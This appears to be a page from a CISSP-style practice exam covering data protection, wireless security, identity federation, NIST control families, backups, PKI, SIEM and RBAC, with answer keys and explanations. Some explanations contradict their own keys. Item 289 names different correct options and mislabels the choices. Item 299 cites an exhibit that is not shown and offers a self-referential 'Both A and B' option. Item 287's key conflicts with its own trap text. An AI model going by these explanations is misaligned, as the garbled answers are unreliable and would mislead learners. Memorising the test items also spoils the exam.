You are the security architect for a multinational corporation that handles highly sensitive intellectual property (IP) and personally identifiable information (PII) for clients in multiple jurisdictions, including GDPR and CCPA regions. The company recently experienced a data breach where an attacker exfiltrated 50 GB of data from a file server by exploiting a vulnerability in the backup software. The backup software had been configured with default credentials and was accessible from the internet. The security team has implemented compensating controls, but management wants to prevent such incidents in the future. You have been asked to recommend a long-term strategy to protect sensitive data assets. The budget is limited, and the solution must minimize user friction. Current environment: On-premises Active Directory with Windows file servers, some data in AWS S3, and a mix of laptops and mobile devices. The organization uses Microsoft 365 for email and collaboration. Which of the following is the BEST course of action?

A.Deploy a data classification and labeling solution integrated with endpoint and network DLP to automatically detect and protect sensitive data
B.Implement multi-factor authentication (MFA) for all administrative accounts and backup interfaces
C.Encrypt all data at rest using AES-256 and implement strict key management policies
D.Segment the backup network from the production network and enforce strict firewall rules
AnswerA

A data-centric approach identifies sensitive data and applies automated controls, reducing the risk of exfiltration across all vectors.

Why this answer

Option A is correct because data classification and labeling, integrated with endpoint and network DLP, directly addresses the root cause: the inability to distinguish sensitive data from non-sensitive data. By automatically classifying and labeling IP and PII, the organization can enforce policy-based protections (e.g., blocking exfiltration, applying encryption) without relying solely on perimeter controls. This minimizes user friction by automating detection and response, and it scales across on-premises, cloud (AWS S3), and Microsoft 365 environments, aligning with GDPR and CCPA requirements for data protection.

Exam trap

The trap here is that candidates often choose MFA or encryption as a silver bullet, but the CISSP exam emphasizes that data classification is the foundational control for protecting sensitive assets, especially when the threat involves data exfiltration via a compromised application, not just unauthorized access or theft of media.

How to eliminate wrong answers

Option B is wrong because MFA for administrative accounts and backup interfaces is a compensating control that reduces the risk of credential theft, but it does not prevent an attacker who exploits a software vulnerability (as in the breach) from exfiltrating data; the backup software was accessible from the internet with default credentials, but MFA would not have stopped the vulnerability exploitation if the attacker bypassed authentication or used a different vector. Option C is wrong because encrypting all data at rest with AES-256 protects data if storage media is stolen, but it does not prevent exfiltration via a live file server or backup software; the attacker exfiltrated data while the server was online and decrypted, so encryption at rest is irrelevant to the attack vector. Option D is wrong because network segmentation and firewall rules reduce the attack surface but do not address the core issue of sensitive data being accessible and unlabeled; the attacker exploited a vulnerability in backup software, and segmentation alone cannot prevent exfiltration if the attacker already has access to the backup network or if the vulnerability allows lateral movement.

287
Multi-Selectmedium

Which THREE of the following are best practices for securing a wireless network?

Select 3 answers
A.Disable SSID broadcast.
B.Enable WPS (Wi-Fi Protected Setup).
C.Use WEP encryption.
D.Use WPA2-Enterprise with 802.1X authentication.
E.Implement MAC address filtering.
AnswersA, D, E

Makes the network less visible to casual scanners.

Why this answer

Disabling SSID broadcast prevents the access point from including the network name in beacon frames. While this does not hide the network from determined attackers using packet analyzers, it reduces casual discovery and is considered a basic security hardening step in defense-in-depth.

Exam trap

The trap here is that candidates often mistake 'security by obscurity' (disabling SSID broadcast) as a primary control, while overlooking that WPS and WEP are fundamentally broken protocols that should never be used in a secure deployment.

288
Multi-Selectmedium

Which TWO protocols are commonly used for identity federation?

Select 2 answers
A.LDAP
B.OAuth 2.0
C.OpenID Connect
D.RADIUS
E.SAML 2.0
AnswersC, E

OpenID Connect is an identity layer on top of OAuth 2.0 for federated authentication.

Why this answer

OpenID Connect (OIDC) is an identity layer built on top of OAuth 2.0 that enables clients to verify the identity of an end-user based on the authentication performed by an authorization server. It provides a standardized way to obtain identity claims via an ID token (JWT) and is widely used for federated identity scenarios, such as single sign-on (SSO) across domains. SAML 2.0 is an XML-based protocol for exchanging authentication and authorization data between an identity provider (IdP) and a service provider (SP), making it a cornerstone of enterprise identity federation.

Exam trap

The trap here is that candidates often confuse OAuth 2.0 with OpenID Connect, mistakenly selecting OAuth 2.0 as a federation protocol when it is solely an authorization framework, not an identity protocol—OpenID Connect is the correct identity layer built on top of it.

289
Multi-Selectmedium

Which THREE of the following are control families defined in NIST SP 800-53? (Choose three.)

Select 3 answers
A.Access Control (AC)
B.System and Communications Protection (SC)
C.Data Encryption (DE)
D.Business Continuity (BC)
E.Identification and Authentication (IA)
AnswersA, B, E

Access Control is a NIST control family.

Why this answer

Options A, C, and E are correct: Access Control (AC), Identification and Authentication (IA), and System and Communications Protection (SC) are NIST SP 800-53 families. Option B (Business Continuity) is not a family; continuity is under Contingency Planning (CP). Option D (Data Encryption) is not a family; encryption is covered under SC.

290
MCQmedium

During a security assessment, it is found that service accounts have interactive logon rights. What is the BEST remediation?

A.Implement Group Policy to deny interactive logon for service accounts.
B.Ensure service accounts use strong passwords.
C.Use managed service accounts instead.
D.Remove service accounts from the local Administrators group.
AnswerC

MSAs have no interactive logon rights and automatically rotate passwords.

Why this answer

Managed Service Accounts (MSAs) are the best remediation because they are designed specifically for service accounts, automatically manage password changes, and by default have no interactive logon rights. This eliminates the security risk of interactive logon while also addressing password management and reducing administrative overhead. Group Policy changes or manual password policies do not address the underlying architectural issue of using a standard user account for a service.

Exam trap

The trap here is that candidates often choose a Group Policy or password-strength solution because they focus on mitigating the symptom (interactive logon) rather than selecting the architectural fix (MSAs) that eliminates the root cause and aligns with the principle of least privilege and secure design.

How to eliminate wrong answers

Option A is wrong because implementing Group Policy to deny interactive logon for service accounts is a workaround that does not address the root cause; it can be bypassed or misconfigured, and it still leaves the account with other unnecessary privileges and manual password management. Option B is wrong because ensuring strong passwords only mitigates the risk of credential theft but does not prevent interactive logon, which is the primary vulnerability; service accounts should not have interactive logon rights regardless of password strength. Option D is wrong because removing service accounts from the local Administrators group reduces privileges but does not prevent interactive logon; a service account could still log on interactively with lower privileges, which is still a security concern.

291
Multi-Selectmedium

Which TWO of the following are key objectives of a security assessment? (Select exactly 2.)

Select 2 answers
A.Identify vulnerabilities in systems and applications.
B.Assess the effectiveness of existing security controls.
C.Exploit vulnerabilities to gain unauthorized access.
D.Prioritize threats based on business impact.
E.Implement new security controls to address findings.
AnswersA, B

Vulnerability identification is a primary goal of security assessments.

Why this answer

A is correct because identifying vulnerabilities is a primary objective of a security assessment, such as a vulnerability scan or penetration test, which systematically discovers weaknesses in systems and applications (e.g., missing patches, misconfigurations, or insecure code). B is correct because assessing the effectiveness of existing security controls (e.g., firewalls, IDS/IPS, access controls) is a core goal, often achieved through control testing or validation to determine if controls are properly implemented and functioning as intended.

Exam trap

The trap here is that candidates often confuse the objectives of a security assessment (identify vulnerabilities and assess controls) with the objectives of a penetration test (exploit vulnerabilities) or risk management (prioritize threats), leading them to select options C or D incorrectly.

292
MCQmedium

An organization is implementing a new backup strategy for its critical servers. The backup must support rapid restoration of individual files and allow for a recovery point objective (RPO) of no more than 15 minutes. Which backup method should be used for daily operations?

A.Full backup every 24 hours
B.Continuous data protection (CDP)
C.Differential backup every 6 hours
D.Incremental backup every 4 hours
AnswerB

CDP captures every write, enabling restoration to any point within seconds, meeting the RPO.

Why this answer

Continuous data protection (CDP) is the only backup method that can guarantee a recovery point objective (RPO) of 15 minutes or less because it captures every write to disk in real time or near-real time, enabling restoration to any point within the protection window. Full, differential, and incremental backups all rely on periodic snapshots, which inherently introduce gaps that exceed a 15-minute RPO unless the interval is shorter than 15 minutes, which is impractical for daily operations.

Exam trap

The trap here is that candidates may confuse the backup method's recovery time objective (RTO) with the recovery point objective (RPO), or assume that frequent incremental backups (e.g., every 4 hours) can achieve a 15-minute RPO, but the RPO is determined by the backup interval, not the method's efficiency.

How to eliminate wrong answers

Option A is wrong because a full backup every 24 hours provides an RPO of up to 24 hours, far exceeding the 15-minute requirement. Option C is wrong because a differential backup every 6 hours still leaves up to 6 hours of potential data loss between backups. Option D is wrong because an incremental backup every 4 hours results in an RPO of up to 4 hours, which does not meet the 15-minute threshold.

293
MCQmedium

A network engineer is troubleshooting a slow VPN connection between two sites. The link is symmetric 100 Mbps, but throughput tests show only 20 Mbps. The VPN uses AES-256 encryption. What is the most likely cause?

A.Packet loss due to link congestion
B.CPU bottleneck on the VPN endpoints
C.MTU mismatch causing fragmentation
D.Incorrect TCP window scaling
AnswerB

AES-256 encryption consumes CPU resources; if the devices are underpowered, throughput will be severely limited.

Why this answer

AES-256 encryption is computationally intensive, and the throughput of a VPN is often limited by the cryptographic processing capacity of the endpoint CPUs rather than the link bandwidth. A symmetric 100 Mbps link with only 20 Mbps throughput strongly indicates that the VPN endpoints cannot encrypt/decrypt fast enough, creating a CPU bottleneck.

Exam trap

The trap here is that candidates often assume a slow VPN is always due to network issues like congestion or MTU, but the CISSP exam tests the understanding that encryption overhead, especially with AES-256, can be a CPU-bound bottleneck on the endpoints.

How to eliminate wrong answers

Option A is wrong because packet loss due to link congestion would typically cause TCP throughput to drop, but the link is symmetric 100 Mbps and not reported as saturated; the symptom is a consistent throughput cap, not variable loss. Option C is wrong because MTU mismatch causing fragmentation would result in increased overhead and possibly packet drops, but it would not consistently cap throughput at exactly 20 Mbps; it would cause performance degradation with larger packets, not a fixed rate. Option D is wrong because incorrect TCP window scaling can limit throughput on high-latency links, but the question does not mention high latency, and a fixed 20 Mbps cap on a 100 Mbps link is more characteristic of a CPU processing limit than a window scaling issue.

294
MCQmedium

A healthcare organization is implementing a new SIEM solution to centralize log management from its network devices, servers, and applications. The compliance team requires that all logs be retained for at least one year to meet HIPAA regulations. The SIEM platform has limited storage capacity and uses a hot/warm/cold tier architecture. The system currently ingests about 500 GB of logs per day. The security team wants to ensure that critical logs (e.g., authentication failures, privilege escalations) remain immediately searchable for at least 90 days, while less critical logs can be moved to cheaper storage after 30 days. What is the most cost-effective storage strategy that meets all requirements?

A.Store all logs in hot storage for 90 days, then archive to cold storage indefinitely.
B.Store only critical logs in hot storage for 1 year, delete non-critical logs after 30 days.
C.Store all logs in hot storage for 30 days, then delete them after 90 days.
D.Store critical logs in hot storage for 90 days, then move all logs to warm/cold storage for the remainder of the year.
AnswerD

Meets both immediate searchability and long-term retention cost-effectively.

Why this answer

Option D is correct because it aligns the SIEM's hot/warm/cold tier architecture with the organization's retention and searchability requirements. Critical logs remain in hot storage for 90 days for immediate searching, then all logs are moved to cheaper warm/cold storage for the remaining 275 days to meet the one-year HIPAA retention mandate. This balances cost efficiency with compliance, avoiding unnecessary hot storage costs for non-critical logs beyond 30 days.

Exam trap

The trap here is that candidates assume all logs must be treated identically or that compliance allows deletion of non-critical logs, but HIPAA requires retention of all logs for one year, and tiered storage allows cost-effective compliance by separating searchability from retention duration.

How to eliminate wrong answers

Option A is wrong because storing all logs in hot storage for 90 days wastes resources on non-critical logs that only need 30 days of hot retention, and archiving indefinitely after 90 days may exceed the one-year retention requirement without cost optimization. Option B is wrong because deleting non-critical logs after 30 days violates HIPAA's one-year retention requirement for all logs, not just critical ones. Option C is wrong because deleting all logs after 90 days fails the one-year retention mandate entirely, and storing all logs in hot storage for 30 days is inefficient for critical logs that need 90 days of immediate searchability.

295
MCQeasy

A development team is integrating a third-party library for encryption. The security team insists on using only the latest version of the library. What is the primary security benefit of this requirement?

A.Improves performance due to optimized code.
B.Ensures the library has more features than older versions.
C.Reduces the attack surface by patching known vulnerabilities.
D.Guarantees backward compatibility with existing code.
AnswerC

The latest version includes fixes for vulnerabilities discovered in prior versions.

Why this answer

Option C is correct because using the latest version ensures that known vulnerabilities in older versions are patched. Option A is wrong because backward compatibility is not the primary security benefit. Option B is wrong because newer versions may introduce new features but can also break compatibility.

Option D is wrong because performance improvements are secondary to security.

296
MCQmedium

A company uses a cloud storage service. Which asset security control is most important to prevent unauthorized access to data?

A.Logging and monitoring
B.Encryption in transit and at rest
C.Periodic access reviews
D.Regular vulnerability scanning
AnswerB

Encryption renders data unreadable without keys, preventing unauthorized access.

Why this answer

Encryption in transit (e.g., TLS 1.3) and at rest (e.g., AES-256) is the most important asset security control because it renders data unreadable even if the cloud storage service is compromised or an attacker gains access to the underlying infrastructure. Without encryption, all other controls (logging, reviews, scanning) are reactive and cannot prevent a direct breach of the stored data. This aligns with the CISSP principle of defense in depth, where encryption provides a strong preventive layer for data confidentiality.

Exam trap

ISC2 often tests the misconception that logging or access reviews are sufficient to prevent unauthorized access, but the trap here is that only encryption provides a strong preventive control that protects data confidentiality regardless of other failures.

How to eliminate wrong answers

Option A is wrong because logging and monitoring are detective controls that identify unauthorized access after it occurs, not preventive controls that stop it in the first place. Option C is wrong because periodic access reviews are administrative controls that verify existing permissions but do not prevent an attacker from exploiting a misconfiguration or stolen credential between reviews. Option D is wrong because regular vulnerability scanning identifies weaknesses in the system but does not directly protect the data itself; encryption is a compensating control that mitigates the risk of exploitation even if vulnerabilities exist.

297
MCQmedium

A large organization needs to deploy a Public Key Infrastructure (PKI) for thousands of devices and users. A key requirement is the ability to revoke certificates in real time when a device is lost or compromised. Which solution is most appropriate?

A.Deploy multiple hierarchical CAs and distribute CRLs periodically.
B.Rely on certificate expiration only and do not implement revocation.
C.Use a single Certificate Authority (CA) with a large Certificate Revocation List (CRL).
D.Implement Online Certificate Status Protocol (OCSP) responders.
AnswerD

OCSP allows real-time verification of certificate status.

Why this answer

OCSP provides real-time certificate status checking by querying an OCSP responder directly, eliminating the delays inherent in CRL distribution. This meets the requirement for immediate revocation verification when a device is lost or compromised, as the responder can return a 'revoked' status instantly without waiting for a CRL refresh cycle.

Exam trap

The trap here is that candidates confuse periodic CRL distribution (which is batch-oriented and slow) with real-time revocation, or assume a single CA with a large CRL is sufficient, overlooking the scalability and latency issues that make OCSP the correct choice for immediate status checks.

How to eliminate wrong answers

Option A is wrong because distributing CRLs periodically introduces latency (hours or days) between revocation and propagation, failing the real-time requirement. Option B is wrong because relying solely on certificate expiration ignores the need for immediate revocation, leaving compromised certificates valid until their natural expiry. Option C is wrong because a single CA with a large CRL creates a single point of failure and scalability issues, and CRLs are still distributed periodically, not in real time.

298
Multi-Selecthard

An organization is implementing a security information and event management (SIEM) system. Which THREE factors are most critical for the SIEM to provide actionable security insights?

Select 3 answers
A.Real-time alerting capabilities
B.Ability to store raw logs for one year
C.Correlation rules that match attack patterns
D.Low false-positive rate
E.Accurate and normalized log sources
AnswersA, C, E

Timely alerts are crucial for response.

Why this answer

Real-time alerting is critical because SIEM must detect and notify security teams of ongoing threats within seconds to minutes, enabling timely incident response. Without near-instantaneous correlation and alerting, attackers can achieve their objectives (e.g., lateral movement, data exfiltration) before the organization even knows an incident occurred. This aligns with the NIST SP 800-61 incident response lifecycle, where detection and analysis must be rapid to contain damage.

Exam trap

The trap here is that candidates confuse 'low false-positive rate' (a tuning outcome) with a critical implementation factor, when in fact the foundational requirements are accurate normalized logs, correlation rules, and real-time alerting — without these, no alerts (true or false) can be generated at all.

299
MCQeasy

Refer to the exhibit. A project team is sending a spreadsheet marked Confidential via email. What control is required?

A.Both A and B
B.Encrypt the email and attachment
C.No additional controls if sent over internal network
D.Use a secure file transfer protocol
AnswerB

Email encryption protects the data in transit as policy requires.

Why this answer

Option B is correct because email transmissions, including attachments, are transmitted in plaintext by default using SMTP (RFC 5321). Encrypting both the email body and the attachment ensures confidentiality, protecting the spreadsheet marked Confidential from unauthorized access during transit. This aligns with the principle of protecting data at rest and in transit as required by asset security policies.

Exam trap

The trap here is that candidates assume internal networks are safe or that secure file transfer protocols are equivalent to email encryption, but CISSP tests the specific requirement to protect data in transit over any network, including internal ones, using appropriate cryptographic controls like email encryption.

How to eliminate wrong answers

Option A is wrong because it is not a distinct control but a combination of options, and since only Option B is correct, 'Both A and B' is invalid. Option C is wrong because internal networks are not inherently secure; traffic can be intercepted via ARP spoofing or network sniffing, and no additional controls would violate confidentiality requirements for sensitive data. Option D is wrong because secure file transfer protocols (e.g., SFTP, FTPS) are designed for file transfers, not for sending email; using such a protocol would not address the email transmission channel itself, leaving the email body and metadata exposed.

300
Multi-Selecthard

A developer is implementing role-based access control (RBAC). Which THREE components are essential for an RBAC system?

Select 3 answers
A.Permissions
B.Attributes
C.Users
D.Roles
E.Sessions
AnswersA, C, D

Permissions define access rights.

Why this answer

RBAC is defined by users, roles, and permissions. Sessions are optional enhancements. Attributes are part of ABAC, not RBAC.

Page 3

Page 4 of 8

Page 5

All pages